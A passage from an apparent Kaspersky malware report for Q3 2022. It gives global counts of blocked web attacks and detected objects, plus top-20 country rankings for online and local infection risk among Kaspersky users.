In Q3 2022, Kaspersky solutions blocked 956,074,958 attacks launched from online resources across the globe. A total of 251,288,987 unique URLs were recognized as malicious by Web Anti-Virus components.

_Distribution of web-attack sources by country and territory, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154703/11-en-malware-report-q3-2022-pc-stat.png>))_

### Countries and territories where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.

Note that these rankings only include attacks by malicious objects that fall under the **Malware** class; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.
| | Country or territory* | %** |
|---|---|---|
| 1 | Taiwan | 19.65 |
| 2 | Belarus | 17.01 |
| 3 | Serbia | 15.05 |
| 4 | Russia | 14.12 |
| 5 | Algeria | 14.01 |
| 6 | Turkey | 13.82 |
| 7 | Tunisia | 13.31 |
| 8 | Bangladesh | 13.30 |
| 9 | Moldova | 13.22 |
| 10 | Palestine | 12.61 |
| 11 | Yemen | 12.58 |
| 12 | Ukraine | 12.25 |
| 13 | Libya | 12.23 |
| 14 | Sri Lanka | 11.97 |
| 15 | Kyrgyzstan | 11.69 |
| 16 | Estonia | 11.65 |
| 17 | Hong Kong | 11.52 |
| 18 | Nepal | 11.52 |
| 19 | Syria | 11.39 |
| 20 | Lithuania | 11.33 |

_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._
_** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._

On average during the quarter, 9.08% of internet users' computers worldwide were subjected to at least one **Malware**-class web attack.

## Local threats

_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._

In Q3 2022, our File Anti-Virus detected **49,275,253** malicious and potentially unwanted objects.

### Countries and territories where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

These rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.
| | Country or territory* | %** |
|---|---|---|
| 1 | Turkmenistan | 46.48 |
| 2 | Yemen | 45.12 |
| 3 | Afghanistan | 44.18 |
| 4 | Cuba | 40.48 |
| 5 | Tajikistan | 39.17 |
| 6 | Bangladesh | 37.06 |
| 7 | Uzbekistan | 37.00 |
| 8 | Ethiopia | 36.96 |
| 9 | South Sudan | 36.89 |
| 10 | Myanmar | 36.64 |
| 11 | Syria | 34.82 |
| 12 | Benin | 34.56 |
| 13 | Burundi | 33.91 |
| 14 | Tanzania | 33.05 |
| 15 | Rwanda | 33.03 |
| 16 | Chad | 33.01 |
| 17 | Venezuela | 32.79 |
| 18 | Cameroon | 32.30 |
| 19 | Sudan | 31.93 |
| 20 | Malawi | 31.88 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._

On average worldwide, Malware-class local threats were registered on 14.74% of users' computers at least once during Q3. Russia scored 16.60% in this ranking.

